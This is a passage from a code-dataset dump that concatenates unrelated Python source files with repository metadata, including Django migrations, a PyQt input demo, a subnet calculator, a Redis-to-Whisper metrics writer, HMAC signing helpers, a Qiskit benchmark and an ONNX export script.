model_name='call',
name='scientific_clusters_question',
field=models.BooleanField(default=False, help_text='True if the Research Cluster question is enabled'),
),
migrations.AlterField(
model_name='historicalcall',
name='scientific_clusters_question',
field=models.BooleanField(default=False, help_text='True if the Research Cluster question is enabled'),
),
migrations.AlterField(
model_name='proposalscientificcluster',
name='keywords',
field=models.ManyToManyField(help_text='Keywords that describe the research cluster', to='project_core.Keyword'),
),
migrations.AlterField(
model_name='proposalscientificcluster',
name='proposal',
field=models.ForeignKey(help_text='Proposal that this Research Cluster refers to', on_delete=django.db.models.deletion.PROTECT, to='project_core.proposal'),
),
migrations.AlterField(
model_name='proposalscientificcluster',
name='sub_pi',
field=models.ForeignKey(help_text='Main person of this research cluster', on_delete=django.db.models.deletion.PROTECT, to='project_core.personposition'),
),
migrations.AlterField(
model_name='proposalscientificcluster',
name='title',
field=models.CharField(help_text='Title of the research cluster', max_length=500),
),
]
|
[
"[email protected]"
] | |
01f2b39e906fa6896ddad81b11c800af607781d7
|
652121d51e6ff25aa5b1ad6df2be7eb341683c35
|
/examples/mouse_and_key_modifiers.py
|
6d28b7351cebc4f69acb343c35eb8233fa6877a3
|
[] |
no_license
|
jgalaz84/eman2
|
be93624f1c261048170b85416e517e5813992501
|
6d3a1249ed590bbc92e25fb0fc319e3ce17deb65
|
refs/heads/master
| 2020-04-25T18:15:55.870663 | 2015-06-05T20:21:44 | 2015-06-05T20:21:44 | 36,952,784 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,615 |
py
|
from PyQt4 import QtCore, QtGui
class MouseAndKeyModifiers(QtGui.QWidget):
def __init__(self, parent = None):
QtGui.QWidget.__init__(self, parent)
layout = QtGui.QVBoxLayout()
label = QtGui.QLabel("Click here to test mouse buttons: Left, Right, Middle\nand keyboard modifiers: Ctrl, Alt, Shift, and Command (a Mac key)")
self.text_browser = QtGui.QTextBrowser()
layout.addWidget(label)
layout.addWidget(self.text_browser)
self.setLayout(layout)
def mousePressEvent(self, event):
self.text_browser.clear()
self.text_browser.append("Mouse press info...")
if event.buttons()&QtCore.Qt.LeftButton:
self.text_browser.append("Left Button")
if event.buttons()&QtCore.Qt.MidButton:
self.text_browser.append("Middle Button")
if event.buttons()&QtCore.Qt.RightButton:
self.text_browser.append("Right Button")
if event.modifiers()&QtCore.Qt.ShiftModifier:
self.text_browser.append("Shift Modifier")
if event.modifiers()&QtCore.Qt.ControlModifier:
#Apple/Command key on a Mac... NOT CONTROL KEY ON A MAC!
self.text_browser.append("Control Modifier")
if event.modifiers()&QtCore.Qt.AltModifier:
#Alt/Option key on a Mac. An EMAN convention is that Alt+Left click works like a middle click.
self.text_browser.append("Alt Modifier")
if event.modifiers()&QtCore.Qt.MetaModifier:
#Control Key on a Mac. A Mac convention is that Ctrl+Left Click works like a right click.
self.text_browser.append("Meta Modifier")
if __name__ == "__main__":
import sys
app = QtGui.QApplication(sys.argv)
window = MouseAndKeyModifiers()
window.show()
sys.exit(app.exec_())
|
[
"[email protected]"
] | |
b8e8df4165e5c68d730eab8b8fe69f808f78ca32
|
bc08302533982d4a154f5615a2c8366f695234e5
|
/work/tools/free_ip.py
|
721bcc9f76e13c7c646d22000c17c96dd1e0352c
|
[] |
no_license
|
rvfedorin/PythonDevelopment
|
bfd3cfb4ad22d72e2002d7430fa8821ea35717f6
|
d6748189874b53b8357d5b3ff7d520ff0a93e15a
|
refs/heads/master
| 2022-12-13T11:53:16.041737 | 2019-02-15T08:50:15 | 2019-02-15T08:50:15 | 122,050,190 | 0 | 0 | null | 2022-12-08T01:18:43 | 2018-02-19T10:57:37 |
Python
|
UTF-8
|
Python
| false | false | 3,528 |
py
|
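# Scans a /24 network for free, size-aligned subnets (/25 through /32), given a
# list of used /29-/30 allocations; only the fourth octet is tracked, and 'x'
# marks an address as used.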
def mark_used_ip(list_used_ip, list_all_ip):
for ip in list_all_ip:
if ip in list_used_ip:
position_ip = list_all_ip.index(ip)
list_all_ip[position_ip] = 'x'
def get_free_lan(list_ip_with_used):
free_lan = []
for lan in range(25, 33):
count_subnet = 2**(lan - 24)
count_ip_in_subnet = 2**(32 - lan)
start_ip = 0
end_ip = count_ip_in_subnet
for subnet in range(count_subnet):
if len(list_ip_with_used) >= end_ip and 'x' not in list_ip_with_used[start_ip:end_ip]:
free_lan.append(f'{list_ip_with_used[start_ip]}/{lan}')
all_ip_temp = [_ for _ in list_ip_with_used if _ not in list_ip_with_used[start_ip:end_ip]]
list_ip_with_used = all_ip_temp[:]
else:
start_ip += count_ip_in_subnet
end_ip += count_ip_in_subnet
if len(list_ip_with_used) == 0:
break
if len(list_ip_with_used) == 0:
break
return free_lan
def get_only_fourth_octet(list_ip):
list_octets = []
for i in list_ip:
octet = i.split('.')
list_octets.append(int(octet[3]))
lan = f'{octet[0]}.{octet[1]}.{octet[2]}.'
return list_octets, lan
def get_all_ip_in_lan(list_lan):
ip_of_all_lan = []
for lan in list_lan:
mask_lan = lan.split('/')
lan_ip = mask_lan[0].split('.')
for i in range(2**(32-int(mask_lan[1]))):
four_octet = int(lan_ip[3])+i
ip_of_all_lan.append(f'{lan_ip[0]}.{lan_ip[1]}.{lan_ip[2]}.{four_octet}')
return ip_of_all_lan
if __name__ == '__main__':
all_ip = []
for i in range(256):
all_ip.append(i)
x = (get_all_ip_in_lan(['172.30.86.164/30', '172.30.86.216/30', '172.30.86.152/30', '172.30.86.156/30',
'172.30.86.160/30', '172.30.86.144/30', '172.30.86.140/30', '172.30.86.136/30',
'172.30.86.120/30', '172.30.86.116/30', '172.30.86.88/30', '172.30.86.92/30',
'172.30.86.96/30', '172.30.86.80/30', '172.30.86.20/30', '172.30.86.184/30',
'172.30.86.196/30', '172.30.86.212/30', '172.30.86.220/30', '172.30.86.224/30',
'172.30.86.232/30', '172.30.86.236/30', '172.30.86.240/30', '172.30.86.248/30',
'172.30.86.252/30', '172.30.86.132/30', '172.30.86.44/30', '172.30.86.148/30',
'172.30.86.76/30', '172.30.86.48/30', '172.30.86.40/30', '172.30.86.84/30',
'172.30.86.36/30', '172.30.86.72/30', '172.30.86.104/30', '172.30.86.108/30',
'172.30.86.24/30', '172.30.86.228/30', '172.30.86.204/30', '172.30.86.0/30',
'172.30.86.4/30', '172.30.86.8/30', '172.30.86.12/30', '172.30.86.244/30',
'172.30.86.192/30', '172.30.86.124/30', '172.30.86.112/30', '172.30.86.60/30',
'172.30.86.208/30', '172.30.86.176/30', '172.30.86.68/30', '172.30.86.28/30',
'172.30.86.32/30', '172.30.86.56/30', '172.30.86.100/30', '172.30.86.168/29',
'172.30.86.200/30', '172.30.86.188/30', '172.30.86.180/30']))
list_used_ip = x
list_used_ip_octet, lan24 = get_only_fourth_octet(list_used_ip)
mark_used_ip(list_used_ip_octet, all_ip)
free = get_free_lan(all_ip)
for i in free:
print(f'{lan24}{i}')
|
[
"[email protected]"
] | |
1c95e6322f01f2981b14f4584444c325432b8207
|
490ffe1023a601760ae7288e86723f0c6e366bba
|
/kolla-docker/patching/zun_compute_api/providerregion.py
|
4dc91fc51a266902d9ef25f4c4c4b88fc506ef8c
|
[] |
no_license
|
bopopescu/Cloud-User-Management
|
89696a5ea5d2f95191327fbeab6c3e400bbfb2b8
|
390988bf4915a276c7bf8d96b62c3051c17d9e6e
|
refs/heads/master
| 2022-11-19T10:09:36.662906 | 2018-11-07T20:28:31 | 2018-11-07T20:28:31 | 281,786,345 | 0 | 0 | null | 2020-07-22T21:26:07 | 2020-07-22T21:26:06 | null |
UTF-8
|
Python
| false | false | 1,658 |
py
|
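    # NOTE: this is a fragment of a compute-API class; `direct_action`,
    # `self.manager` and `self.rpcapi` are assumed to be defined by the
    # enclosing module/class.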
def providerregion_update(self, context, container, *args):
if direct_action:
return self.manager.providerregion_update(context, container, *args)
else:
return self.rpcapi.providerregion_update(context, container, *args)
def providerregion_show(self, context, container, *args):
if direct_action:
return self.manager.providerregion_show(context, container)
else:
return self.rpcapi.providerregion_show(context, container)
def providerregion_create(self, context, new_providerregion, extra_spec,
requested_networks):
host_state = None
try:
host_state = {} # self._schedule_container(context, new_providerregion, extra_spec)
except Exception as exc:
# new_providerregion.status = consts.ERROR
# new_providerregion.status_reason = str(exc)
# new_providerregion.save(context)
return
if direct_action:
self.manager.providerregion_create(context, "", requested_networks, new_providerregion)
else:
self.rpcapi.providerregion_create(context, "", new_providerregion, "", requested_networks)
# self.rpcapi.providerregion_create(context, host_state['host'],
# new_providerregion, host_state['limits'],
# requested_networks)
def providerregion_delete(self, context, container, *args):
return self.manager.providerregion_delete(context, container, True)
# return self.rpcapi.providerregion_delete(context, container, *args)
|
[
"[email protected]"
] | |
ea468b999d209aa5949f47fbf2a33213a78b306b
|
4369c5a214f8c4fb1f8a286f72d57cfa9c3f02c7
|
/geotrek/maintenance/migrations/0010_auto_20200228_1755.py
|
dfa45158e5acc1cee91f1e527738011a5ef40379
|
[
"BSD-2-Clause"
] |
permissive
|
GeotrekCE/Geotrek-admin
|
c13d251066e92359c26f22d185b8bd2e26e622ef
|
a91b75261a876be51ad2a693618629900bea6003
|
refs/heads/master
| 2023-08-21T12:45:25.586551 | 2023-08-09T12:28:33 | 2023-08-09T12:28:33 | 9,886,107 | 71 | 56 |
BSD-2-Clause
| 2023-09-13T09:40:33 | 2013-05-06T12:17:21 |
Python
|
UTF-8
|
Python
| false | false | 1,121 |
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.14 on 2020-02-28 16:55
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('maintenance', '0009_auto_20200211_1011'),
]
operations = [
migrations.AlterField(
model_name='intervention',
name='date_insert',
field=models.DateTimeField(auto_now_add=True, verbose_name='Insertion date'),
),
migrations.AlterField(
model_name='intervention',
name='date_update',
field=models.DateTimeField(auto_now=True, db_index=True, verbose_name='Update date'),
),
migrations.AlterField(
model_name='project',
name='date_insert',
field=models.DateTimeField(auto_now_add=True, verbose_name='Insertion date'),
),
migrations.AlterField(
model_name='project',
name='date_update',
field=models.DateTimeField(auto_now=True, db_index=True, verbose_name='Update date'),
),
]
|
[
"[email protected]"
] | |
a67fd9139f1b1a1a5f55555ccfc4ea911006371a
|
f1e98def25f88d17c328c07d4052cd6c34c27707
|
/app/accounts/migrations/0002_alter_account_is_active.py
|
c7dd55e323cc76df4802b6c243d6f44f3d2b3d94
|
[
"MIT"
] |
permissive
|
iyanuashiri/exchange-api
|
c7f1fd2257c3369de9c0b7bea6806c602f25662e
|
86f7a4e9fb17f71888e6854510618876d1010c19
|
refs/heads/main
| 2023-05-30T22:57:46.901693 | 2021-06-13T21:59:22 | 2021-06-13T21:59:22 | 376,542,066 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 520 |
py
|
# Generated by Django 3.2.4 on 2021-06-13 17:32
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('accounts', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='account',
name='is_active',
field=models.BooleanField(default=True, help_text='Designates whether this user should be treated as active. Unselect this instead of deleting accounts.', verbose_name='active'),
),
]
|
[
"[email protected]"
] | |
34b10e72f10087aaa703323b4c4bb1e1fefdc4d2
|
5b7d5723b84f5011965aba18ebf0c080253b2fcb
|
/posts/views/feed.py
|
607dc5b67c34d133f749e9e5c0c63d56c801c80a
|
[
"MIT"
] |
permissive
|
ReDetection/vas3k.club
|
5980e6849ccf2e67a380d80d23036ec09ed94453
|
ad97fefca5ec52047b2daad77ddf2eb2aecb03b3
|
refs/heads/master
| 2023-06-11T19:48:56.730541 | 2020-08-12T17:44:26 | 2020-08-12T17:44:26 | 287,545,618 | 0 | 0 |
MIT
| 2020-08-14T13:58:31 | 2020-08-14T13:58:30 | null |
UTF-8
|
Python
| false | false | 2,905 |
py
|
from datetime import datetime, timedelta
from django.db.models import Q
from django.http import Http404
from django.shortcuts import get_object_or_404, render
from auth.helpers import auth_required
from common.pagination import paginate
from posts.models import Post, Topic
POST_TYPE_ALL = "all"
ORDERING_ACTIVITY = "activity"
ORDERING_NEW = "new"
ORDERING_TOP = "top"
ORDERING_TOP_WEEK = "top_week"
ORDERING_TOP_MONTH = "top_month"
@auth_required
def feed(request, post_type=POST_TYPE_ALL, topic_slug=None, ordering=ORDERING_ACTIVITY):
    post_type = post_type or POST_TYPE_ALL
if request.me:
request.me.update_last_activity()
posts = Post.objects_for_user(request.me)
else:
posts = Post.visible_objects()
# filter posts by type
if post_type != POST_TYPE_ALL:
posts = posts.filter(type=post_type)
# filter by topic
topic = None
if topic_slug:
topic = get_object_or_404(Topic, slug=topic_slug)
posts = posts.filter(topic=topic)
# hide non-public posts and intros from unauthorized users
if not request.me:
posts = posts.exclude(is_public=False).exclude(type=Post.TYPE_INTRO)
# exclude shadow banned posts, but show them in "new" tab
if ordering != ORDERING_NEW:
if request.me:
posts = posts.exclude(Q(is_shadow_banned=True) & ~Q(author_id=request.me.id))
else:
posts = posts.exclude(is_shadow_banned=True)
# no type and topic? probably it's the main page, let's apply some more filters
if not topic and post_type == POST_TYPE_ALL:
posts = posts.filter(is_visible_on_main_page=True)
# order posts by some metric
if ordering:
if ordering == ORDERING_ACTIVITY:
posts = posts.order_by("-last_activity_at")
elif ordering == ORDERING_NEW:
posts = posts.order_by("-published_at", "-created_at")
elif ordering == ORDERING_TOP:
posts = posts.order_by("-upvotes")
elif ordering == ORDERING_TOP_WEEK:
posts = posts.filter(
published_at__gte=datetime.utcnow() - timedelta(days=7)
).order_by("-upvotes")
elif ordering == ORDERING_TOP_MONTH:
posts = posts.filter(
published_at__gte=datetime.utcnow() - timedelta(days=31)
).order_by("-upvotes")
else:
raise Http404()
# split results into pinned and unpinned posts on main page
pinned_posts = []
if ordering == ORDERING_ACTIVITY:
pinned_posts = posts.filter(is_pinned_until__gte=datetime.utcnow())
posts = posts.exclude(id__in=[p.id for p in pinned_posts])
return render(request, "posts/feed.html", {
"post_type": post_type or POST_TYPE_ALL,
"ordering": ordering,
"topic": topic,
"posts": paginate(request, posts),
"pinned_posts": pinned_posts,
})
|
[
"[email protected]"
] | |
5c3b9ce4daac002df7317fca1d9da2026544660a
|
82205ef1622ef3bb3bd4982f6ddc52509686af8c
|
/numba2/pipeline.py
|
6a3813352da9a461afdad7bd801f5f684e75bdd7
|
[] |
no_license
|
cooperliu101/numba-lang
|
22f1567e17cd7cf831f254bf64bc7e3192c973c3
|
37abfcbb516175153e73474dababb2d89cba7a8b
|
refs/heads/master
| 2021-07-21T14:35:23.943243 | 2013-11-15T12:07:53 | 2013-11-15T12:07:53 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,460 |
py
|
# -*- coding: utf-8 -*-
"""
Pipeline that determines phase ordering and execution.
"""
from __future__ import print_function, division, absolute_import
import dis
import types
import pykit.ir
#===------------------------------------------------------------------===
# Pipeline
#===------------------------------------------------------------------===
def run_pipeline(func, env, passes):
"""
Run a sequence of transforms (given as functions or modules) on the
AIR function.
"""
env['numba.state.crnt_func'] = func
for transform in passes:
func, env = apply_transform(transform, func, env)
env['numba.state.crnt_func'] = func
return func, env
def apply_transform(transform, func, env):
if isinstance(transform, types.ModuleType):
result = transform.run(func, env)
else:
result = transform(func, env)
result = _check_transform_result(transform, func, env, result)
return result or (func, env)
def _check_transform_result(transform, func, env, result):
if result is not None and not isinstance(result, tuple):
if isinstance(result, pykit.ir.Function):
return result, env
if isinstance(transform, types.ModuleType):
transform = transform.run
transform = transform.__module__ + '.' + transform.__name__
raise ValueError(
"Expected (func, env) result in %r, got %s" % (transform, result))
return result
|
[
"[email protected]"
] | |
f3e7ef114ef2471fbf5671381769253a62f14fce
|
f693c9c487d31a677f009afcdf922b4e7f7d1af0
|
/biomixer-venv/bin/rst2latex.py
|
f2bf88ab2545f14b13e630bbf6232fa0aac977a0
|
[
"MIT"
] |
permissive
|
Shellowb/BioMixer
|
9048b6c07fa30b83c87402284f0cebd11a58e772
|
1939261589fe8d6584a942a99f0308e898a28c1c
|
refs/heads/master
| 2022-10-05T08:16:11.236866 | 2021-06-29T17:20:45 | 2021-06-29T17:20:45 | 164,722,008 | 1 | 3 |
MIT
| 2022-09-30T20:23:34 | 2019-01-08T19:52:12 |
Python
|
UTF-8
|
Python
| false | false | 831 |
py
|
#!/home/shello/Documents/BioMixer/biomixer-venv/bin/python
# $Id: rst2latex.py 5905 2009-04-16 12:04:49Z milde $
# Author: David Goodger <[email protected]>
# Copyright: This module has been placed in the public domain.
"""
A minimal front end to the Docutils Publisher, producing LaTeX.
"""
try:
import locale
locale.setlocale(locale.LC_ALL, '')
except:
pass
from docutils.core import publish_cmdline
description = ('Generates LaTeX documents from standalone reStructuredText '
'sources. '
'Reads from <source> (default is stdin) and writes to '
'<destination> (default is stdout). See '
'<http://docutils.sourceforge.net/docs/user/latex.html> for '
'the full reference.')
publish_cmdline(writer_name='latex', description=description)
|
[
"[email protected]"
] | |
5114e9fb9e89b7c121fe36ba7adffd2c63ca57fb
|
1f5299e547125f7ba2c3b72984e82ba3b1f984de
|
/basejumper/security.py
|
ad0e4a6b627153a5f150932198651845b40573cd
|
[] |
no_license
|
ESGF/basejump
|
72b805818188ae09b1e3329035718b0816927a13
|
593d5e57e63848c30219ca9b49e25f49b59dcf82
|
refs/heads/master
| 2021-07-23T04:19:57.489628 | 2017-11-02T16:51:52 | 2017-11-02T16:51:52 | 47,994,570 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 908 |
py
|
import hmac
import hashlib
import json
import collections
def constant_time_compare(val1, val2):
# We'll allow them to know that the lengths of the strings don't match
if len(val1) != len(val2):
return False
result = 0
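    # accumulate differences with XOR so the comparison takes the same time
    # no matter where (or whether) the strings differ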
for x, y in zip(val1, val2):
result |= ord(x) ^ ord(y)
return result == 0
def hmac_compare(key, msg, known):
h = hmac.new(key, msg, hashlib.sha256)
return constant_time_compare(h.hexdigest(), known)
def get_dict_signature(dictionary, key):
h = hmac.new(key, digestmod=hashlib.sha256)
for k in sorted(dictionary.keys()):
h.update(k)
h.update(str(dictionary[k]))
return h.hexdigest()
def check_json_sig(dictionary, key, signature):
return constant_time_compare(get_dict_signature(dictionary, key), signature)
def sign_path(path, key):
h = hmac.new(key, path, hashlib.sha256)
return h.hexdigest()
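# Minimal usage sketch (illustrative only; the key and path below are made up):
if __name__ == '__main__':
    key = 'shared-secret'
    sig = sign_path('/esgf/data/file.nc', key)
    assert hmac_compare(key, '/esgf/data/file.nc', sig)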
|
[
"[email protected]"
] | |
c433ae0599808eb1ea13010018c8a7e094198719
|
de24f83a5e3768a2638ebcf13cbe717e75740168
|
/moodledata/vpl_data/63/usersdata/189/29190/submittedfiles/swamee.py
|
3b19ef457ff49af07dc44e820878bdc4c334e957
|
[] |
no_license
|
rafaelperazzo/programacao-web
|
95643423a35c44613b0f64bed05bd34780fe2436
|
170dd5440afb9ee68a973f3de13a99aa4c735d79
|
refs/heads/master
| 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 414 |
py
|
# -*- coding: utf-8 -*-
import math
f= float(input('digite f:'))
l= float(input('digite l:'))
q= float(input('digite q:'))
delta= float(input('digite delta:'))
v= float(input('digite v:'))
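# Swamee's direct-design relations (assumed intent of the expressions below):
#   D  = [8 f L Q^2 / (pi^2 g delta)]^(1/5)
#   Re = 4 Q / (pi D v)
#   f  = 0.25 / log10(eps/(3.7 D) + 5.74/Re^0.9)^2,  with eps = 0.000002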
d=((8*f*l*q**2)/(3.14159**2*9.81*delta))**(1.0/5.0)
rey=((4*q)/(3.14159*d*v))
k=0.25/(math.log10(0.000002/(3.7*d)+5.74/rey**0.9))**2
print('O valor de D é %.4f' %d)
print('O valor de Rey é %.4f' %rey)
print('O valor de K é %.4f' %k)
|
[
"[email protected]"
] | |
8bafb18de3c09b4e845ad8d2df44676d5617bfad
|
3e3743928f43aaef5cfb72e257b6f091fc2a39cb
|
/src/whirlwind/tornado/carbon/persist.py
|
6a4360ba75d08129ad746ac60e9c350f75c12a51
|
[
"Apache-2.0"
] |
permissive
|
bearstech/whirlwind-tornado
|
3871862944f584816a1d90891cec815f64209e14
|
85b9e6b4b3413694cb6e5040ce5c72b6e5e436ac
|
refs/heads/master
| 2021-01-18T14:10:05.666763 | 2020-10-13T09:47:05 | 2020-10-13T09:47:05 | 10,527,838 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,992 |
py
|
import time
import struct
import os.path
import os
import whisper
from redis import StrictRedis as Redis
from whirlwind import target_to_path
METRICS = 'metrics'
PERIOD = 30
METRIC_WRITE = 'carbon.write'
METRIC_POINTS = 'carbon.points'
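# Each sample is packed as two big-endian float32s: (timestamp, value).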
class Persist(object):
""" Sequential writer for Carbon server.
The story is simple, fetch data from redis, write them, wait, loop.
This code is supervised by Carbon daemon.
"""
def __init__(self, path="/tmp/"):
self.redis = Redis()
self.path = path
self.dirs = set()
self.redis.sadd(METRICS, METRIC_POINTS, METRIC_WRITE)
def metric(self, name, value):
"Add some metrics : make your own dogfood, just before lunch."
timestamp = time.time()
serialized = struct.pack('!ff', timestamp, value)
pipe = self.redis.pipeline()
pipe.zadd(name, timestamp, serialized)
pipe.publish(name, serialized)
pipe.execute()
def run(self):
while True:
before = time.time()
self.handle()
after = time.time()
self.metric(METRIC_WRITE, (after - before) * 1000)
            time.sleep(max(0, PERIOD - int(after - before)))
def handle(self):
points = 0
for metric in self.redis.smembers(METRICS):
values = self.redis.zrange(metric, 0, -1)
points += len(values)
f = target_to_path(self.path, metric)
d = os.path.dirname(f)
if d not in self.dirs:
if not os.path.isdir(d):
os.makedirs(d)
self.dirs.add(d)
if not os.path.exists(f):
whisper.create(f, [(10, 1000)]) # [FIXME] hardcoded values
whisper.update_many(f, [struct.unpack('!ff', a) for a in values])
if len(values):
self.redis.zrem(metric, *values)
self.metric(METRIC_POINTS, points)
if __name__ == "__main__":
p = Persist()
p.run()
|
[
"[email protected]"
] | |
dc49aee3b646e4e2864be55fd34519a351e9c3ad
|
09e57dd1374713f06b70d7b37a580130d9bbab0d
|
/data/p4VQE/R1/benchmark/startQiskit_noisy83.py
|
997aaa1938fcb497d01eab2eff9be00509126ac8
|
[
"BSD-3-Clause"
] |
permissive
|
UCLA-SEAL/QDiff
|
ad53650034897abb5941e74539e3aee8edb600ab
|
d968cbc47fe926b7f88b4adf10490f1edd6f8819
|
refs/heads/main
| 2023-08-05T04:52:24.961998 | 2021-09-19T02:56:16 | 2021-09-19T02:56:16 | 405,159,939 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,391 |
py
|
# qubit number=3
# total number=9
import numpy as np
from qiskit import QuantumCircuit, execute, Aer, QuantumRegister, ClassicalRegister, transpile, BasicAer, IBMQ
import networkx as nx
from qiskit.visualization import plot_histogram
from typing import *
from pprint import pprint
from math import log2
from collections import Counter
from qiskit.test.mock import FakeVigo, FakeYorktown
kernel = 'circuit/bernstein'
def make_circuit(n:int) -> QuantumCircuit:
# circuit begin
input_qubit = QuantumRegister(n,"qc")
prog = QuantumCircuit(input_qubit)
prog.h(input_qubit[0]) # number=1
prog.h(input_qubit[1]) # number=2
prog.h(input_qubit[2]) # number=3
prog.h(input_qubit[3]) # number=4
for edge in E:
k = edge[0]
l = edge[1]
prog.cp(-2 * gamma, input_qubit[k-1], input_qubit[l-1])
prog.p(gamma, k)
prog.p(gamma, l)
prog.rx(2 * beta, range(len(V)))
prog.swap(input_qubit[1],input_qubit[0]) # number=5
prog.swap(input_qubit[1],input_qubit[0]) # number=6
prog.y(input_qubit[2]) # number=7
prog.y(input_qubit[2]) # number=8
# circuit end
return prog
if __name__ == '__main__':
n = 4
V = np.arange(0, n, 1)
E = [(0, 1, 1.0), (0, 2, 1.0), (1, 2, 1.0), (3, 2, 1.0), (3, 1, 1.0)]
G = nx.Graph()
G.add_nodes_from(V)
G.add_weighted_edges_from(E)
step_size = 0.1
a_gamma = np.arange(0, np.pi, step_size)
a_beta = np.arange(0, np.pi, step_size)
a_gamma, a_beta = np.meshgrid(a_gamma, a_beta)
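    # grid-search the closed-form F1 landscape below for the best (gamma, beta) pair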
F1 = 3 - (np.sin(2 * a_beta) ** 2 * np.sin(2 * a_gamma) ** 2 - 0.5 * np.sin(4 * a_beta) * np.sin(4 * a_gamma)) * (
1 + np.cos(4 * a_gamma) ** 2)
result = np.where(F1 == np.amax(F1))
a = list(zip(result[0], result[1]))[0]
gamma = a[0] * step_size
beta = a[1] * step_size
prog = make_circuit(4)
sample_shot =5200
writefile = open("../data/startQiskit_noisy83.csv", "w")
# prog.draw('mpl', filename=(kernel + '.png'))
backend = FakeYorktown()
circuit1 = transpile(prog, FakeYorktown())
circuit1.measure_all()
prog = circuit1
info = execute(prog,backend=backend, shots=sample_shot).result().get_counts()
print(info, file=writefile)
print("results end", file=writefile)
print(circuit1.depth(), file=writefile)
print(circuit1, file=writefile)
writefile.close()
|
[
"[email protected]"
] | |
e680ac98db693298f1bdeb9376fa11577feeb89a
|
c237e2f29eac2b92bd2b77d055e33cf760960284
|
/todobackend/todo/serializers.py
|
dc073eafa9c9e17d9bdc60cc128b53a776392e7b
|
[] |
no_license
|
razyesh/Django-TODO-React
|
7f3293c858099f8656a287c8706f739b1d513077
|
b8529138334710d582324f286c10a39197aca25d
|
refs/heads/master
| 2022-12-11T11:20:33.622468 | 2019-06-28T10:28:03 | 2019-06-28T10:28:03 | 194,255,236 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 272 |
py
|
from rest_framework import serializers
from .models import Todo
class TodoSerializer(serializers.ModelSerializer):
class Meta:
model = Todo
fields = (
'id',
'title',
'description',
'completed',
)
|
[
"[email protected]"
] | |
25c3b42a397977592ebd6616aeefe441954c721c
|
2e682fd72e3feaa70e3f7bf2a3b83c50d783ec02
|
/PyTorch/built-in/cv/classification/3D_ResNet_ID0421_for_PyTorch/pth2onnx.py
|
344f0acb80d30eeb817bac80202a259a4e4fbed2
|
[
"GPL-1.0-or-later",
"MIT",
"Apache-2.0",
"BSD-2-Clause",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
Ascend/ModelZoo-PyTorch
|
4c89414b9e2582cef9926d4670108a090c839d2d
|
92acc188d3a0f634de58463b6676e70df83ef808
|
refs/heads/master
| 2023-07-19T12:40:00.512853 | 2023-07-17T02:48:18 | 2023-07-17T02:48:18 | 483,502,469 | 23 | 6 |
Apache-2.0
| 2022-10-15T09:29:12 | 2022-04-20T04:11:18 |
Python
|
UTF-8
|
Python
| false | false | 2,739 |
py
|
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from pathlib import Path
import json
import random
import os
import numpy as np
import torch
from opts import parse_opts
from model import (generate_model, load_pretrained_model, make_data_parallel,
get_fine_tuning_parameters)
def json_serial(obj):
if isinstance(obj, Path):
return str(obj)
def get_opt():
opt = parse_opts()
if opt.root_path is not None:
opt.video_path = opt.root_path / opt.video_path
opt.annotation_path = opt.root_path / opt.annotation_path
opt.result_path = opt.root_path / opt.result_path
if opt.resume_path is not None:
opt.resume_path = opt.root_path / opt.resume_path
opt.arch = '{}-{}'.format(opt.model, opt.model_depth)
opt.begin_epoch = 1
opt.n_input_channels = 3
print(opt)
with (opt.result_path / 'opts.json').open('w') as opt_file:
json.dump(vars(opt), opt_file, default=json_serial)
return opt
def resume_model(resume_path, arch, model):
print('loading checkpoint {} model'.format(resume_path))
checkpoint = torch.load(resume_path, map_location='cpu')
assert arch == checkpoint['arch']
if hasattr(model, 'module'):
model.module.load_state_dict(checkpoint['state_dict'])
else:
model.load_state_dict(checkpoint['state_dict'])
return model
def main_worker(index, opt):
random.seed(opt.manual_seed)
np.random.seed(opt.manual_seed)
torch.manual_seed(opt.manual_seed)
model = generate_model(opt)
if opt.resume_path is not None:
model = resume_model(opt.resume_path, opt.arch, model)
model = make_data_parallel(model, opt.distributed, opt.device)
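    # dummy input shape: (batch, channels, frames, height, width), as consumed by the 3D ResNet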
dummy_input = torch.ones(10, 3, 16, 112, 112)
torch.onnx.export(
model,
dummy_input,
'3D-ResNets.onnx',
input_names=['input'],
output_names=['output'],
export_params=True,
do_constant_folding=True,
verbose=True,
opset_version=11)
print('3D-ResNets.onnx export success')
if __name__ == '__main__':
opt = get_opt()
opt.device = torch.device('cpu')
main_worker(-1, opt)
|
[
"[email protected]"
] | |
fe0b784d9423f6752a2e04ea2db13d45f4526bf0
|
7249edf3365731c92a9c9c05db3186894306cc17
|
/python/src/vmaf/svmutil.py
|
ca49e991943642c3fce7b7aca7f07566c7af3622
|
[
"LGPL-3.0-or-later",
"Apache-2.0"
] |
permissive
|
sunery/vmaf
|
22e2f782549e1c71aa6f5160f26350e0aca06189
|
03eb8a4980b1bf2b3edd66767e67927109dbd9de
|
refs/heads/master
| 2020-04-01T15:12:57.469291 | 2018-10-15T00:31:21 | 2018-10-15T00:31:21 | 153,327,009 | 1 | 0 |
Apache-2.0
| 2018-10-16T17:32:53 | 2018-10-16T17:32:53 | null |
UTF-8
|
Python
| false | false | 735 |
py
|
# TODO: dependency on libsvm/svmutil needs to be properly done, this is a temporary workaround wrapper
from __future__ import absolute_import
import sys
from vmaf.config import VmafConfig
# This will work only when running with a checked out vmaf source, but not via pip install
